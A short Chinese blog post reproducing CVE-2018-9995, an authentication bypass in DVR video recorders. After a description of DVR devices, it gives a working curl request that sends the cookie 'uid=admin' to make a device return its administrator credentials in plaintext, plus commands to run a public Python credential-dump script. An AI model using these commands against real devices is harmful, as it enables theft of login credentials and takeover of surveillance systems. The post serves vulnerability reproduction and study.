CVE-2018-9995漏洞复现

DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一大堆设备的功能。

最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。并且在GitHub发布了相关验证说明。

使用curl漏洞复现模拟:
命令:
curl “http://ip:port/device.rsp?opt=user&cmd=list” -H “Cookie: uid=admin” && echo “”
在这里插入图片描述

得到用户名admin 密码为空。

使用原版python代码:
CVE-2018-9995漏洞复现_第1张图片

键入命令:
cd CVE-2018-9995_dvr_credentials
python CVE-2018-9995_dvr_credentials --host ip --port
CVE-2018-9995漏洞复现_第2张图片
运行结果:

CVE-2018-9995漏洞复现_第3张图片

你可能感兴趣的:(CVE-2018-9995漏洞复现)